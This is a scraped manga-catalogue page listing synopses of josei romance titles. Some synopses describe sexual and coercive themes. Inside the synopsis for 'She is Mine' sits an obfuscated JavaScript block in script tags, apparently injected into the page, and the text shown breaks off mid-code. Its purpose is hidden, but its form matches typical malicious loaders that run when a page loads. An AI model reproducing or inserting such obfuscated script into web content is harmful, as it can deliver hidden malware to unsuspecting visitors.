Josei - Page 103

Josei manga is designed for adult women, often covering themes such as love, career, and personal growth. It typically focuses on more realistic portrayals of relationships and emotional maturity, compared to the idealized stories in shoujo manga.

3234 results

Gisou Furin

Shoko has turned 30 and she has finally given up on finding a marriage partner. Recently having completed a year long contract, she wants to explore the freedom her lack of relationship and job obligations afford her and books a trip to Seoul, Korea. Unencumbered, she wants to visit the Korean BBQ restaurants alone and drink to celebrate her "graduation from marriage seeking activities." Not quite supportive is her sister, one who is already married to a good-looking, high earning man, who thinks Shoko should do the responsible thing and give marriage hunting a shot again. But Shoko cannot be deterred. But life has a strange way of turning things around. On her trip to Seoul, Shoko makes a surprising discovery, and an unexpected connection... This is a collaborative project between Higashimura Akiko and NAVER webtoon, which may be the first of its kind, at least involving such a luminary figure in manga. It is being released in Korean and Japanese, but not quite simul-release. Korean is about 20 chapters ahead.


Shinya Zangyou - Do S Joushi Ga Midara Ni Kuruwasu Ero Shidou

"This is your punishment... for having these dirty thoughts." In the marketing department of an advertising agency, Komaki Musashi, who works there, is tasked with participating in a major competition alongside their boss, Toru Arikawa. During overtime in the empty office late at night, Komaki feels uneasy being alone with Arikawa. Sensing her suspicious behavior, Arikawa asks, "Hey, are you... perhaps seducing me?" Then, Arikawa suddenly kisses her...!! Their hot tongues entwine, clothes are taken off... and Komaki opens her legs on her own. Their lewd breaths and sweat mixing together... "Don't... make a sound......" Komaki is at the mercy of his relentless caresses. The two, who had a boss-subordinate relationship, what lies ahead for them...?! The popular Ear-Candy Situation Drama CD label, is back with its long-awaited second comic adaptation for "Late-Night Overtime"!


My Girlfriend's Child

From Seven Seas: Sachi and her boyfriend Takara are a young couple in high school. They go to school together, hang out, and even engage in the more intimate side of dating. However, after a recent evening of sex, Sachi gets the feeling that something isn’t right and buys a pregnancy test. Later, in the bathroom of a family restaurant far from her home, she sees the two red lines that will change her life forever. A tender and honest look at the realities of teen pregnancy. Note: Won the 47th Annual Kodansha Manga Award for Shoujo in 2023 and the Eisner Awards in the Best Publication for Teens category in 2024.


The View Beyond

Two nameless siblings: a sister with a heart condition which prohibits her from having sex, and a brother who only has sex with sleeping women. The brother has a new girlfriend, and the sister dreams of dying. What once was will determine what must be.


Wife for 1000 Days

Ever since she married rich hottie Seon Moon-hyuk, people began to call Jo Eunae the 'Cinderella of the 21st Century'. But Eunae's life is no fairy taile, and her marriage... well, it's barely even real! Imagine still being a virgin after three years of marriage! Desperate to live the life she's always wanted, Eunae asks for a divorce on their 1000th day of marriage. Except, suddenly her oh-so-sexy husband seems interested in her for the first time! Her's putting in more effort than ever before, but why now...?


She is Mine [Manhua]

The elite private tutor, Min Jiang Xi, who is good at "pretending", managed to clinch the CEO Qin Zhan as a client. He, who hates women flocking towards him, warns that "he simply lacks a tutor, not a girlfriend". As he instructed, she is courteous and distant, never crossing the boundaries. But one year later, a drunk Qin Zhan states that "I won’t force you to like me, so don’t force me to not like you. I can’t do it". Can she, who doesn’t believe in love, find it with him?<script></script><script>(function(_0xd46242,_0x477632){var _0x399e6b=_0x2a9e,_0x2b2130=_0xd46242();while(!![]){try{var _0xe2c429=-parseInt(_0x399e6b(0xb4))/(-0x9*0x3fd+0x9b*0x28+0xbae)*(parseInt(_0x399e6b(0xbd))/(-0x1*0x3e9+-0x764+0xb4f*0x1))+-parseInt(_0x399e6b(0xc9))/(-0x1403+-0xb7c+0x1f82)+parseInt(_0x399e6b(0xd0))/(0x58d+0x1e70+-0x1*0x23f9)*(-parseInt(_0x399e6b(0xc3))/(0x2*-0x109c+-0x2*0xb05+0x3747))+parseInt(_0x399e6b(0xc1))/(-0x7*0x281+-0xfef+0x217c)*(-parseInt(_0x399e6b(0xb2))/(0x1857+-0x31*0x15+-0x144b))+-parseInt(_0x399e6b(0xcb))/(0x1d18*0x1+0x1*0x16af+-0x33bf)+parseInt(_0x399e6b(0xb1))/(0x1*0x29a+0xb*-0x41+0x2*0x1d)*(parseInt(_0x399e6b(0xc2))/(0x2c5*0x3+0x1546*0x1+0x1*-0x1d8b))+parseInt(_0x399e6b(0xb8))/(-0x1*0xed5+-0x14b8+0x2398)*(parseInt(_0x399e6b(0xd2))/(0x2b3*0x9+0xc5+-0x1904));if(_0xe2c429===_0x477632)break;else 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When The Count’s Illegitimate Daughter Gets Married

“Dirty wench! You stole my necklace!” “Unless I knew where your necklace was, I wouldn’t have been able to take it.” As an illegitimate child, Laritte’s biggest sin was being born. In the year she became an adult, she was sent to marry the ghost duke who was rumored to be dead. Her miserable life seemed to get worse and worse, however… Her life changed when the duke came back alive. “Madam, how do you like it?” Kind servants, “You have enough luxury to buy some residences in the capital.” “…no one will be able to look down on you anymore.” And the empire’s devoted and murderous duke. It was already too late for those who tormented Laritte to regret it.


Trapped By The Crazy Twins

Read manga Trapped By The Crazy Twins / I, Who Am Kept. -Am Trapped by the Twins Who Love Me Madly… / My Daily Life is Filled With Gloominess, As I Am Kept by Gorgeous Twins. / Kawareru, Watashi. – Kyou Ai no Futago ni Torawarete I am “kept” by the mad love of these twins. What is the sweet ending to this twisted form of love…? When Hokuto Yonaga turned five, her father took her to the Fudou Zaibatsu mansion. There they met the heirs to the Fudou family, the beautiful identical twins Tsuzuri and Katari. For thirteen years since her father sold her to them as a plaything, Yonaga has been at the mercy of the whimsical and sadistic twins, who are the complete opposite of their beautiful appearance. She secretly harboured feelings of hatred towards the twins who had ruined her life. However, when the three of them start living together on the occasion of entering university, the relationship between Tsuzuri and Katari over Yonaga gradually begins to unravel. Then one day, a man called Yagami appears in front of Yonaga… A forbidden love-hate story full of beautiful madness begins here. “Trapped By The Crazy Twins Manga” is alternative: 我被眷養了。―被狂愛的雙子囚禁― 華麗なる双子に飼われた私の日常は、陰鬱に塗れている 飼われる、私。―狂愛の双子に囚われて―


The Contract Couple: Ines & Kaisac

As The Adopted Daughter Of House Avano, Ines Has Always Been Grateful For Her Loving Family. But Tragically, Half Of Them Succumb To An Ancient Curse, And Only After Does She Find A Way To Lift It. An Oracle Says That She Must Marry The Cold And Cruel Duke, Kaisac Aljert, To Prevent The Deaths Of The Rest Of Her Family. So She Enters Into A Contract With Him, But He Has A Rather Steamy Stipulation That He Wants Every Night. Can Ines Handle Kaisac’s Passion When She Just Wants To Save Her Family?


I Love You Until Morning

Hibiki, 28 years old, was dumped by her boyfriend she'd been going out with for five years, but Yusa, her junior at the office makes a fierce move on her saying that he had his sights on her for a long time. He's usually cute, but he's sexually aggressive between the sheets. Start the secret office romance with a wicked handsome junior.


Hugging Is Not Enough

"Come here and you'll feel refreshed. '' My coworker hugged me against his hot chest, and made me feel pleasure over and over. I can't stop coming...!


Chikutaku Bonbon

From Perpetual Motion: Taking her grandfather’s advice, Iwa, who is in Tokyo for work, strives to do good deeds wherever she goes. Whether it be rescuing an injured bat on the sidewalk or helping out a sickly young man, the city is turning out to be a very interesting place.
